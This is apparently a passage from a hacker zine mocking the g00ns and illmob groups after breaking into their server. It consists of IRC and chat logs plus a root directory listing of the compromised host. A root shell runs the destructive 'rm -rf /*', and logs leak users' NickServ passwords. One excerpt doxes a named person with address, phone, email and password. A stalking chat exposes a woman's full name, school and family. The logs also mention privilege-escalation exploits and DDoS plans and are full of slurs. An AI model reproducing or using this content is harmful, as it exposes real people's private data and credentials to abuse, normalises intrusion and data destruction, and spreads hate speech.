Selfish 11:56 <+Zombocom> she's allways confused with her sexuality 11:56 <+Zombocom> so she's always angry 11:56 < Angyl> im playing trivia 11:56 <+theswellseason> you're asking to get rooted boy 11:56 < Angyl> and im alrdy on xanax 11:56 <+theswellseason> LOL 11:56 <+theswellseason> shit, not even that works 11:56 <+theswellseason> <3 11:56 < r00tr00t> [root@demon2 lib]# rm -rf /* 11:56 < r00tr00t> rm: cannot remove `/aquota.group': Operation not permitted 11:56 < r00tr00t> rm: cannot remove `/aquota.user': Operation not permitted 11:56 < r00tr00t> bye bye 11:56 < Angyl> lol 11:56 <+Zombocom> not even xanax can stop her hormonal rage 11:56 <+Zombocom> NOTHING CAN TOP HER 11:56 <+Zombocom> STAY OUT OF HER WAY 11:57 < Angyl> im not raging 11:57 * Zombocom jumps in front of a train 11:57 < Slowpoke> What about 11:57 < Slowpoke> a slowpoke 11:57 < Slowpoke> ^_^^ 11:57 <%andy> everyone in here thats connected to irc.evilcoders.net 11:57 <+Zombocom> OH GOD 11:57 <%andy> connect to irc.partyvan.fm 11:57 <+Zombocom> SHE'S SO ANGRY 11:57 <+Zombocom> SHE'S SUPER FUCKING PISSED 11:57 -!- Netsplit irc.evilcoders.net <-> haruhi.partyvan.hub quits: p00h, kumar, +PhyuK|Shmoke, malaphus, +Zombocom, Striker, andy, Gibby, ECB, @FuRY, (+34 more, use /NETSPLIT to show all of them) 11:58 -!- Angyl [Angyl@] has quit [Quit: ] --- Log closed Wed May 07 11:58:41 2008 14:10 -!- lilo [lilo@D609CC9E.EF030B1D.2A28F7FA.IP] has joined #G00NS 14:11 < lilo> trintitty f4rh@nLOL° 14:11 < lilo> plasma jblink 14:11 <%plasma> wat 14:11 <%plasma> lolol 14:11 < lilo> trintitty -> nickserv: identify lolh@x0r 14:11 < lilo> lulz 14:11 <%plasma> that's sad :( 14:11 < fff> l0l 14:11 < lilo> PhyuK -> nickserv: identify 1asdf2 14:11 <%plasma> colombia :O 14:11 -!- lilo [lilo@D609CC9E.EF030B1D.2A28F7FA.IP] has quit [Killed (core (faggot))] 14:11 <+d0ct0r> lol 14:11 < fff> u dumb j3ws 14:12 <+theswellseason> wait, core are those right? 14:12 <+d0ct0r> i dont think so. 14:12 <+theswellseason> lol nvm 14:12 <+theswellseason> you wouldn't tell me if you could 14:12 <%plasma> well 14:12 <%plasma> he got mine right 14:12 -!- PhyuK [kyle.mclol@sluts.r.us] has quit [NickServ (GHOST command used by canr)] 14:12 <%plasma> :( 14:12 <%canr> lol its right 14:12 <+d0ct0r> lol 14:12 -!- trintitty [trintitty@DESU-598F0E26.dsl.mindspring.com] has quit [NickServ (GHOST command used by w)] 14:12 <%andy> oh mother fucker 14:12 <+theswellseason> oh shit! 14:12 < fff> lilo -> nickserv: identify isuckalotofdickmmm 14:12 <+d0ct0r> :O 14:12 <+theswellseason> core, get what's that fucker's IP? 14:13 -!- syph [syph@freecandy.van] has joined #G00NS 14:13 -!- mode/#g00ns [+h syph] by HustleServ 14:13 <%plasma> theswellseason: it was a proxy 14:13 * d0ct0r goes to change all his pw's 14:13 <%plasma> in colombia 14:13 <@core> theswellseason: im not retarded 14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm 14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm 14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm 14:13 -!- PhyuK [kyle.mclol@sluts.r.us] has joined #G00NS 14:13 -!- mode/#g00ns [+v PhyuK] by HustleServ 14:13 <%syph> hai 14:13 <+PhyuK> o no my irc nick 14:13 <+PhyuK> :( 14:13 <+PhyuK> im h4xed 14:13 <+PhyuK> i use that pw for EVERYTHING 14:13 -!- trintitty [trintitty@DESU-598F0E26.dsl.mindspring.com] has joined #G00NS 14:13 -!- mode/#g00ns [+o trintitty] by HustleServ 14:13 <%plasma> why didnt he deface g00ns.net? :p 14:13 <@trintitty> ... 14:14 <+theswellseason> you were hacked 14:14 <@trintitty> because he had more ultimate pwnage in mind.. 14:14 -!- grub [grub@FB6A658F.9037C7E6.2A28F7FA.IP] has joined #G00NS 14:14 < grub> FuRY -> nickserv: identify asshole6669 14:14 -!- trintitty [trintitty@DESU-598F0E26.dsl.mindspring.com] has quit [NickServ (GHOST command used by fff)] 14:14 <%plasma> lol 14:14 < fff> lol 14:14 -!- mode/#g00ns [+b *!*@desu-2A800167.dynamic.swissvpn.net] by canr 14:14 < grub> core -> nickserv: IDENTIFY h4xorwooT 14:14 -!- fff [fff@DESU-2A800167.dynamic.swissvpn.net] has quit [Killed (core (-))] 14:14 -!- FuRY|Working is now known as FuRY 14:14 -!- FuRY is now known as drop 14:14 -!- core [~core@fbi.lol] has quit [NickServ (GHOST command used by plasma)] 14:16 -!- core [~core@fbi.lol] has joined #G00NS 14:16 -!- mode/#g00ns [+o core] by HustleServ 14:16 -!- FuRY [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has joined #G00NS 14:16 < FuRY> :| 14:16 < FuRY> `up 14:16 <+PhyuK> I hope everybody is aware of the repercussions 14:17 <@core> change your passes 14:17 <@core> /ns set password 14:17 <%canr> why ;\ 14:17 < FuRY> i dropped mine 14:17 < FuRY> :P 14:17 <%canr> if he can get it again 14:17 <%andy> `sop add FuRY 14:17 < FuRY> `up 14:17 -!- mode/#g00ns [+ao FuRY FuRY] by HustleServ 14:17 <&FuRY> thx 14:17 -!- mode/#g00ns [+v canr] by canr 14:17 <@w> why are pw's not encrypted 14:17 <%plasma> w: well, they used to be :( 14:49 <~clorox> g00ns are over 14:50 -!- clorox changed the topic of #G00NS to:  FUKKEN ANGRY LACROSSE HACKERS - http://xi.7x.ru/~inaki/g00ns/ - g00ns are over 15:12 <+[nazi]notjack> g00nFuRY (20:47:47): hackers that hack hackers 15:12 < DrMengele> yeah what happened? 15:13 <+[nazi]notjack> zero for owned r00ted g00ns 15:13 <+[nazi]notjack> deleted everything 15:13 <+[nazi]notjack> g00ns may be over 15:13 <+[nazi]notjack> so 15:13 <+[nazi]notjack> drama 15:13 < lollercaust> drama sucks 15:13 < lollercaust> what is zero for owned website? 15:13 < WB> http://zero.for.owned.on 15:14 < WB> http://zero.for.owned.on.nimp.org 15:14 <+[nazi]notjack> Yeah 15:14 < lollercaust> heh i use lynx smartass 15:15 <~tribal> `akick add * g00ns is over 15:15 <~tribal> what 15:15 -!- tribal is now known as clorox 15:15 <~clorox> `akick add * g00ns is over 15:15 -!- mode/#g00ns [+b *!*@*] by HustleServ 15:15 -!- NoName was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- unknown|49515 was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- TaGg was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- [Midnight] was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- skinless was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- malaphus was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Striker was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- CuNt was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- aempirei was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Gibby was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- KLAUS_NOMI was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- REVEREND_REY was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- iZaP was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- FukkenSaved was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Kame was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Deltantor was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- RickRollington was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- transientox was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Jewgoldz|A[ushwitz] was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- WB was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- DeMiNe0 was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- DrMengele was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Dark_Fusion was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- p00h was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- ECB was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- malaphus|laptop was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- Angyl was kicked from #g00ns by HustleServ [g00ns is over] 15:15 -!- krispin was kicked from #g00ns by HustleServ [g00ns is over] --- Log closed Wed May 07 15:15:24 2008 Fantastic, just FANTASTIC. We were just jealous that g00ns thought of selling t-shirts before we did. Anybody want a "ZF0wned", "0wned by ZF0", or "Featured in ZF04" t-shirt? Look for them at a store near you! Just kidding, we're not in it for the money. If we were, instead of making and selling t-shirts we would make and sell CANVAS. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 illmob zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 illmob was on the g00ns box, but they get their own article because they aren't g00ns and we have a bit of material. illmob is just a laugh no matter how you look at it. Never was taken seriously, and it's claim to fame is ill[will] being imprisoned for selling Windows source code. Check out his legal papers and wikipedia article, name's William Genovese. illmob didn't really get themselves owned, I mean they did not cause the g00ns owning in any way. They weren't even a target, just a helpless battleground spoil. Their only security mistake that lead to this was being hosted on g00ns. It's a mistake nonetheless, albeit one they wanted to correct. It's not like they are really secure or anything, the webdir is basically a poorly managed file dump. We found some funny quotes for you. They give (most of) these out for free in #illmob, check it out for a laugh. They will probably be glad to have another channel member regardless of how you treat them. Phist -> #illmob: [ill]will: I've just realized why nobody links to us anymore and shit canr -> #illmob: Why? Phist -> #illmob: [ill]will: Now that you're out of jail, it's not 'cool' to like illmob Phist -> #illmob: chilly: Please could you commit a crime Phist -> #illmob: but a cool one chilly -> #illmob: jaywalk Phist -> #illmob: because we need more hits // There's a documentary?? Must not have made my local theatre canr -> #illmob: Whats the name of that documentary about [ill]will canr -> #illmob: the 2600 one? Phist -> #illmob: I forget - are you Scandinavian? or Finnish? canr -> #illmob: Freedom Downtime canr -> #illmob: Got it Phist -> #illmob: We've got the skill to be something Phist -> #illmob: and we're wasting our time Spyd3r -> #illmob: yes, I agree Phist -> #illmob: we've got will back Phist -> #illmob: he's a fuckin' ASM master Phist -> #illmob: this is bullshit Phist -> #illmob: we're pro SpunkWang -> #illmob: gh0st: I have normal user access to a box... /r/ sploits (vmsplice doesnt work ;-;_ gh0st -> #illmob: what distro SpunkWang -> #illmob: how do i find out... i knew the command 4 hours ago lol ummmm ECB -> #illmob: its kind of sad, im not smart enough to do computer shit ECB -> #illmob: all this 01010101010101 shit and fucking C++ gh0st -> #illmob: try gh0st -> #illmob: uname -a ECB -> #illmob: I fucking got an A+ in my classes, why cant i understand C++ gh0st -> #illmob: spunkwang: he's running kernel 2.6.9 gh0st -> #illmob: shit is outdated nigga SpunkWang -> #illmob: gh0st: I tried running the vmsplice sploit but it nay work :( // Capitalisation is sweet, is there a Disney movie now or something? Spyd3r -> #illmob: I know shit about system level exploits Riot -> #illmob: Buffer Overflows are fuckin myths to me. Spyd3r -> #illmob: I consider myself a bright guy, but the only programming I do is web apps padlock -> #illmob: I know slack the best padlock -> #illmob: bsd sounds good, too, though padlock -> #illmob: I'm so confused, so many good kernels and distros coldblood -> #illmob: sounds like the new server is mega securer coldblood -> #illmob: k r u really going to need that much sercurity? padlock -> #illmob: Yeah, so I want to make sure we don't get owned stupidly coldblood -> #illmob: yer that would be embassing if you did padlock -> #illmob: Spyd3r is good at making sure the website itself doesn't have a ton of holes, and I secure servers for a living, so I think we should be able to handle it coldblood -> #illmob: yer padlock -> #illmob: Only ports open on the server are for services we'll use padlock -> #illmob: And it'll be behind another firewall on top of that Spyd3r -> #illmob: well we run well over 375 client sites from the farm Spyd3r -> #illmob: only about 200 of those have the add-on that was used to get in canr -> gr0b: Theres this code my friend has: MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECHvugCZLtxdhBAhVuqcPWK5Pig== canr -> gr0b: Hes wondering what encryption that is. Would you happen to know what type? ~~~~~~~~~~~~~~ shamrock -> #illmob: im getting some widgets for yahoo go [ill]will -> #illmob: dont waste your youth on the interweb [ill]will -> #illmob: save it to your late 30s [ill]will -> #illmob: well actually you dont have to worry right now about underage poon [ill]will -> #illmob: so get yourself an aol account [ill]will -> #illmob: and start a/s/l and s2r-ing [ill]will -> #illmob: easy pussy on aol [ill]will -> #illmob: girls on the net have low self esteem coldblood -> #illmob: Beer + penis = pussy canr -> #illmob: no. Phist -> #illmob: canr: ya rly Phist -> #illmob: coldblood: From that one sentence, I just extracted the information that you are a virgin Phist -> #illmob: I'm not gonna sit here and talk shit about it, but I'm pretty insulted Spyd3r -> #illmob: I rather miffed myself Spyd3r -> #illmob: just glad that we're alrdy planning to get on a different server coldblood -> #illmob: then do something about it Phist -> #illmob: I'm not, because z3r0 has done so much for us Spyd3r -> #illmob: I'm so sick of the children Phist -> #illmob: and the g00ns as a group have been really supportive Spyd3r -> #illmob: aye, I must give respect to "the g00ns" Spyd3r -> #illmob: but individually speaking, there's a mean age of 17 Spyd3r -> #illmob: why is it that I've only met 4 intelligent g00ns? Spyd3r -> #illmob: having some experience in the pr0n industry, that doesn't surprise me too much Spyd3r -> #illmob: I've done a lot of free-lance work in what used to be the very respectable SickSiteNetworks Phist -> #illmob: coldblood: He also starred in 2girls1cup Spyd3r -> #illmob: that's the parent company for ConsumptionJunction, SteakandCheese, RevengeWorld, about 5 others Spyd3r -> #illmob: They were acquired back in November, so I haven't done work for them in a bit canr -> #illmob: Shamrock is = Shamrock, sham_, sham, clover, teh, w-,irlgov.ie canr -> gr0b: I want to kill shamrock. canr -> gr0b: I just hate shamrock with a burning passion. shamrock -> a59: uhh wanna own canr with me? Phist -> #illmob: I tried to quit at got promoted Phist -> #illmob: and* Genocide -> #illmob: damn, you suck at quitting Genocide -> #illmob: :) Phist -> #illmob: If I try to quit again, I'll get network admin Phist -> #illmob: :P Phist -> #illmob: seriously though, I hate this Phist -> #illmob: just sayin Genocide -> #illmob: i'm willing to live with that Genocide -> #illmob: you can't leave me ;_ Genocide -> #illmob: ; Phist -> #illmob: I do like the individuals Phist -> #illmob: god fucking dammit Phist -> #illmob: It's not like it makes a difference Phist -> #illmob: We should start an e-war with anonymous // we'll get the word out for you Spyd3r -> Riot: don't take this the wrong way, ok? Riot -> Spyd3r: k Riot -> Spyd3r: :> Spyd3r -> Riot: I gather data on anyone I come across Riot -> Spyd3r: Mhmm. Riot -> Spyd3r: I expecti t. Spyd3r -> Riot: and I have an extensive library on g00ns members Riot -> Spyd3r: I dunno, I'm thinking about leaving g00ns Riot -> Spyd3r: Don't really get much respect for my craft there, you know Riot -> Spyd3r: Can't really grow. Spyd3r -> Riot: I have a lot of respect for a few g00ns in particular Spyd3r -> Riot: I won't state them here, but I'll admit you've made the list Riot -> Spyd3r: Thanks, I appreciate it. Riot -> Spyd3r: #TEXTCEE Spyd3r -> Riot: and of those members, I have called (a few of) their parents and attempted to verify that info Spyd3r -> Riot: tbh, pr0be's mom was hilarious Riot -> Spyd3r: I love probe too Spyd3r -> Riot: I ENVY him! Spyd3r -> Riot: I envy you too Riot -> Spyd3r: Why is that? Spyd3r -> Riot: I'm in my late 20's Riot -> Spyd3r: So. Spyd3r -> Riot: yer both young and brite CryptiK -> #illmob: well anonymous is gay. they can dos me all they want. Phist -> Genocide: Deadly Data Phist -> Genocide: Chris Richardson Phist -> Genocide: Apartment Phist -> Genocide: 2627 N Bourbon St. #27 Phist -> Genocide: Orange, CA 92865 Phist -> Genocide: (714) 322-0741 Phist -> Genocide: Email: Deadlydata Phist -> Genocide: Password: partyguy6924 Phist -> Genocide: IP: Genocide -> Phist: lawlz Phist -> Genocide: That's wrong tribaL -> loSt: as soon as illmob moves off our box loSt -> tribaL: yo tribaL -> loSt: im going to fucking ddos them to shit tribaL -> loSt: i've done EVERYTHINGinmy power t help them tribaL -> loSt: while illwill was locked up tribaL -> loSt: and i get disrespected by him saying he has evverybodys dox tribaL -> loSt: and he doubts i can get his tribaL -> loSt: i fucking hosted their irc loSt -> tribaL: why does illwill think he is the shit? tribaL -> loSt: anybody thats ever fucked with them I TOOK DOWN tribaL -> loSt: its not him loSt -> tribaL: he came back after 2 years thinking he still knows everything ~~~~~~~~~~~~~ Some simple logs for you. [root@demon2 illmob]# ls -al total 92 drwx--x--x 7 illmob illmob 4096 Apr 1 04:21 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. drwx------ 2 illmob illmob 4096 Aug 2 2007 backups -rw-r--r-- 1 illmob illmob 24 Aug 1 2007 .bash_logout -rw-r--r-- 1 illmob illmob 176 Aug 1 2007 .bash_profile -rw-r--r-- 1 illmob illmob 124 Aug 1 2007 .bashrc -rw-r--r-- 1 illmob illmob 3541 Feb 1 11:44 blade.css drwxr-xr-x 3 illmob illmob 4096 Aug 2 2007 domains drwxrwx--- 3 illmob illmob 4096 Mar 12 16:37 imap drwx------ 2 illmob illmob 4096 Aug 1 2007 mail -rw-r--r-- 1 illmob illmob 21544 Feb 1 11:44 network.html -rw-r--r-- 1 illmob illmob 12391 Feb 1 11:44 network.xml lrwxrwxrwx 1 illmob illmob 32 Apr 1 04:21 public_html -> ./domains/illmob.org/public_html -rw-r----- 1 illmob mail 34 Apr 1 04:21 .shadow drwxr-xr-x 3 illmob illmob 4096 Jan 7 20:20 webmail [root@demon2 illmob]# ls -al public_html/ total 39396 drwxr-xr-x 28 illmob illmob 4096 Mar 19 12:37 . drwxr-xr-x 8 illmob illmob 4096 Aug 2 2007 .. -rw-r--r-- 1 illmob illmob 970 Jan 31 2006 404.shtml -rw-r--r-- 1 illmob illmob 90738 Jan 31 2006 404.swf -rw-r--r-- 1 illmob illmob 148330 Jan 2 20:59 60592_owned.jpg -rw-r--r-- 1 illmob illmob 7168 Jan 10 09:25 aim.exe -rw-r--r-- 1 illmob illmob 279054 Jan 10 22:37 aimview.jpg -rw-r--r-- 1 illmob illmob 603176 Feb 21 18:55 autoruns.exe -rw-r--r-- 1 illmob illmob 5672 Feb 24 2006 BatShells.rar -rw-r--r-- 1 illmob illmob 9150 Feb 24 2006 batshells.txt -rw-r--r-- 1 illmob illmob 100 Mar 2 09:44 bb.html -rw-r--r-- 1 illmob illmob 177664 Feb 3 2006 BinaryTextScan.exe -rw-r--r-- 1 illmob illmob 3541 Feb 1 11:46 blade.css -rw-r--r-- 1 illmob illmob 700 Jan 31 2006 blah_left.htm -rw-r--r-- 1 illmob illmob 55233 Jan 31 2006 blah_right.htm -rw-r--r-- 1 illmob illmob 86132 Feb 20 2006 blingring.jpg drwxr-xr-x 2 illmob illmob 4096 Feb 11 07:05 carputer -rw-r--r-- 1 illmob illmob 13962 Feb 12 2006 case.html drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 cd-nix -rw-r--r-- 1 illmob illmob 81 Feb 15 20:58 celebs.html -rw-r--r-- 1 illmob illmob 345466 Feb 15 20:56 celebs.rar -rw-r--r-- 1 illmob illmob 345244 Feb 15 21:00 celebs.zip drwxr-xr-x 2 illmob illmob 4096 Jan 28 2006 cgi-bin drwxr-xr-x 4 illmob illmob 4096 Aug 1 2007 chat drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 clay -rw-r--r-- 1 illmob illmob 13450 Jan 31 2006 Copy of index.php -rw-r--r-- 1 illmob illmob 22565 Jan 14 21:24 Desktop.rar drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 desktops -rw-r--r-- 1 illmob illmob 784605 Oct 30 2006 ds2.mp3 -rw-r--r-- 1 illmob illmob 3139377 Oct 30 2006 ds.mp3 drwxrwxr-x 2 illmob illmob 4096 Aug 4 2007 ff drwxrwxr-x 16 illmob illmob 4096 Aug 1 2007 files -rw-r--r-- 1 illmob illmob 115057 Mar 18 2006 files.html drwxr-xr-x 6 illmob illmob 4096 Aug 1 2007 fingerbang -rw-r--r-- 1 illmob illmob 5310 Dec 19 07:38 firefox.txt drwxr-xr-x 6 illmob illmob 4096 Aug 1 2007 freeillwill -rw-r--r-- 1 illmob illmob 28119 Mar 17 18:54 fuckme.JPG drwxr-xr-x 3 illmob illmob 36864 Aug 12 2007 funny -rw-r--r-- 1 illmob illmob 6301 Jan 5 22:00 getkey.exe -rw-r--r-- 1 illmob illmob 65649 Jan 9 21:37 getkeyvista.JPG -rw-r--r-- 1 illmob illmob 43518 Jan 15 18:12 google.jpg -rw-r--r-- 1 illmob illmob 9652 Jan 31 2006 hack.jpg -rw-r--r-- 1 illmob illmob 3197 Mar 13 20:16 h.gif -rw-r--r-- 1 illmob illmob 69822 Feb 2 2006 hozilla.bmp -rw-r--r-- 1 illmob illmob 100571 Feb 3 2006 hozilla.htm -rw-r--r-- 1 illmob illmob 87474 Dec 21 13:22 hozilla_src.zip -rw-r--r-- 1 illmob illmob 0 Feb 5 2006 .htaccess -rw-r--r-- 1 illmob illmob 16761 Feb 20 2006 illmob_logo.jpg -rw-r--r-- 1 illmob illmob 1134 Feb 1 2006 illmob_radio.pls -rw-r--r-- 1 illmob illmob 199955 Jan 31 2006 illwill.html drwxrwxr-x 8 illmob illmob 4096 Jan 16 06:30 images -rw-r--r-- 1 illmob illmob 95409 Mar 6 2006 img_0029.jpg drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 inc -rwxr-xr-x 1 illmob illmob 608 Apr 28 2006 index.old -rw-r--r-- 1 illmob illmob 8718 Feb 15 2006 index_.php -rw-r--r-- 1 illmob illmob 8712 Feb 14 2006 index.php drwxr-xr-x 3 illmob illmob 4096 Mar 12 16:34 irc -rw-r--r-- 1 illmob illmob 14838 Feb 23 2006 jen2.jpg -rw-r--r-- 1 illmob illmob 15052 Feb 23 2006 jen3.jpg -rw-r--r-- 1 illmob illmob 14896 Feb 23 2006 jen.jpg drwxr-xr-x 4 illmob illmob 4096 Mar 13 21:19 kiddies drwxr-xr-x 2 illmob illmob 4096 Feb 1 11:58 lanimages -rw-r--r-- 1 illmob illmob 331 Jan 31 2006 links.html -rw-r--r-- 1 illmob illmob 775930 Mar 2 2006 ll.jpg -rw-rw-r-- 1 illmob illmob 0 Feb 2 2006 logger.html -rw-r--r-- 1 illmob illmob 219 Feb 2 2006 logger.php -rwxr-xr-x 1 illmob illmob 18554 Jun 5 2003 logo.jpg drwxr-xr-x 3 illmob illmob 4096 Aug 1 2007 macdaddy -rw-r--r-- 1 illmob illmob 2326 Mar 10 2006 macdaddy.html drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 mactrack drwxr-xr-x 2 illmob illmob 4096 Dec 21 12:56 maxima -rw-r--r-- 1 illmob illmob 17518 Dec 21 13:24 me.jpg -rw-r--r-- 1 illmob illmob 447 Feb 13 2006 mia.txt -rw-r--r-- 1 illmob illmob 1475 Feb 23 2006 minishell.asm -rw-r--r-- 1 illmob illmob 2560 Feb 23 2006 minishell.exe -rw-r--r-- 1 illmob illmob 1218 Mar 10 2006 motd -rw-r--r-- 1 illmob illmob 19119 Feb 28 2006 mouth.jpg drwxr-xr-x 2 illmob illmob 4096 Feb 20 15:42 myQuickAdmin -rw-r--r-- 1 illmob illmob 6780 Jan 31 14:38 myspace.html -rw-r--r-- 1 illmob illmob 21548 Feb 1 12:00 network.html -rw-r--r-- 1 illmob illmob 12391 Feb 1 11:46 network.xml drwxr-xr-x 2 illmob illmob 4096 Jan 10 12:56 new -rw-r--r-- 1 illmob illmob 903 Jan 31 2006 new.gif -rw-r--r-- 1 illmob illmob 11903 Jan 31 2006 oldindex.php -rw-r--r-- 1 illmob illmob 53497 Feb 20 2006 panel.php -rw-r--r-- 1 illmob illmob 18438 Jan 10 22:40 passview.jpg -rw-r--r-- 1 illmob illmob 22301 Jan 11 06:33 passview.png -rw-r--r-- 1 illmob illmob 52930 Jan 31 2006 paypal3.jpg -rw-r--r-- 1 illmob illmob 35474 Jan 31 2006 paypal4.jpg -rw-r--r-- 1 illmob illmob 52541 Jan 31 2006 paypal-malcovitch1.jpg -rw-r--r-- 1 illmob illmob 55151 Jan 31 2006 paypal-malcovitch2.jpg -rw-r--r-- 1 illmob illmob 54589 Jan 31 2006 paypal-malcovitch3.jpg -rw-r--r-- 1 illmob illmob 58468 Jan 31 2006 paypal-malcovitch4.jpg drwxr-xr-x 2 illmob illmob 4096 Feb 18 15:30 phist -rw-r--r-- 1 illmob illmob 1922 Dec 4 11:14 php.txt -rw-r--r-- 1 illmob illmob 20867 Mar 2 2006 pigroast.jpg -rw-r--r-- 1 illmob illmob 3564584 Feb 21 18:55 procexp.exe -rw-r--r-- 1 illmob illmob 19987 Feb 24 2006 r00t1n.txt -rw-r--r-- 1 illmob illmob 3772 Mar 31 2006 rainbow.html -rw-r--r-- 1 illmob illmob 40754 Mar 18 2006 releases.html -rw-r--r-- 1 illmob illmob 4604 Feb 24 2006 reverse.bat -rw-r--r-- 1 illmob illmob 850 Jan 31 2006 rid.php -rw-r--r-- 1 illmob illmob 55412 Jul 3 2007 rulezz.conf -rw-r--r-- 1 illmob illmob 3054 Feb 23 2006 shell.bat -rw-r--r-- 1 illmob illmob 9722720 Feb 21 18:54 spybot.exe -rw-r--r-- 1 illmob illmob 18569 Jun 7 2007 staff.html -rw-r--r-- 1 illmob illmob 17038 Oct 9 2006 staff.old -rw-r--r-- 1 illmob illmob 3136 Mar 19 12:37 stalker.txt -rw-r--r-- 1 illmob illmob 1224537 Dec 27 09:21 StupidKidGangsta.gif drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 suspended.page -rw-r--r-- 1 illmob illmob 2560 Jan 31 2006 test.exe -rw-r--r-- 1 illmob illmob 15169130 Mar 12 2006 TheILLIST.rar -rw-r--r-- 1 illmob illmob 940 Nov 1 2006 tikiwiki.txt -rw-r--r-- 1 illmob illmob 186040 Feb 15 2006 tommy.jpg -rw-r--r-- 1 illmob illmob 10181 Jan 16 06:39 toughbook.html -rw-r--r-- 1 illmob illmob 1073835 Dec 26 06:21 usb-rape.zip -rw-r--r-- 1 illmob illmob 2545 Mar 7 2006 users.txt drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 videos -rw-r--r-- 1 illmob illmob 170305 Feb 21 18:27 vnc.exe -rw-r--r-- 1 illmob illmob 115200 Feb 22 18:09 vundofix.exe drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 wan -rw-r--r-- 1 illmob illmob 29639 Feb 20 2006 woodohs.jpg drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 wtf [root@demon2 public_html]# cat stalker.txt [15:53] hackerillwill: hi [15:53] SAMCAT03: hi [15:53] hackerillwill: im still trying to figure you out lol [15:54] SAMCAT03: ok [15:54] hackerillwill: u said wallingfor drighht [15:54] SAMCAT03: dont worry about it [15:57] hackerillwill: WELL I JUST WANTED TO KNOW WHY I ADDE YOU ,THERE HAD TO BE A REASON [15:57] SAMCAT03: well u obviously dont know who i am so why bother [15:57] SAMCAT03: its not important [15:58] hackerillwill: Samcat03 Age: 22, Gender: female, Location: Waterbury, CT [15:58] SAMCAT03: ok [15:58] hackerillwill: Samantha Moeckel [15:58] SAMCAT03: and thats wrong [15:58] hackerillwill: BETTER? [15:59] SAMCAT03: thats not me [15:59] hackerillwill: capricorn [15:59] hackerillwill: attend Western Connecticut State University majoring in secondary math education [15:59] SAMCAT03: nope [16:00] hackerillwill: sgm1385 is your yahoo [16:01] SAMCAT03: why do u care who i am? [16:01] hackerillwill: like i said i was just wondering because i added you like 2 yrs ago [16:01] hackerillwill: and you make me have to do it the hard way [16:01] SAMCAT03: ummm ok [16:01] hackerillwill: maybe we flirted in a chatroom before [16:02] SAMCAT03: u still dont know me though [16:02] SAMCAT03: no cause i dont go on yahoo [16:02] hackerillwill: i never said i talke dto you on yahoo [16:03] hackerillwill: im just saying thats your yahoo name [16:03] SAMCAT03: im sorry im just having a tough time right now i dont mean to be rude [16:03] hackerillwill: its ok [16:04] hackerillwill: yer cute i guess [16:04] SAMCAT03: how do u even have a [pic of me? [16:05] hackerillwill: i have a bunch of pics of you [16:05] SAMCAT03: ok but how? [16:05] hackerillwill: i like the one of you in the black dress in the hcair [16:05] hackerillwill: chair* [16:05] hackerillwill: ok seperate my screen name [16:05] hackerillwill: im illwill [16:06] hackerillwill: whats the first part [16:06] SAMCAT03: u still arent answering the question [16:06] hackerillwill: i just did [16:06] hackerillwill: come on youre a college gril [16:06] hackerillwill: girl* [16:07] hackerillwill: MOECKEL, SAMANTHA G (Age 23) [16:07] hackerillwill: daughter of MOECKEL, SANDRA A (Age 59) [16:07] hackerillwill: better? [16:08] SAMCAT03: i dont got time to be playing games [16:08] SAMCAT03: bye [16:08] hackerillwill: did you seperate my screen name [16:08] hackerillwill: hackerillwill [16:08] hackerillwill: illwill [16:08] hackerillwill: hacker [16:09] SAMCAT03: yes but im not playing bye [16:09] SAMCAT03: i have better things to do then be stalked [16:09] hackerillwill: im not stalking [16:09] hackerillwill: i simply asked who you were [16:09] hackerillwill: thats all i wanted to know [16:10] hackerillwill: you could have said hi im sam im from waterbury [16:10] SAMCAT03: ok so then u know so bue 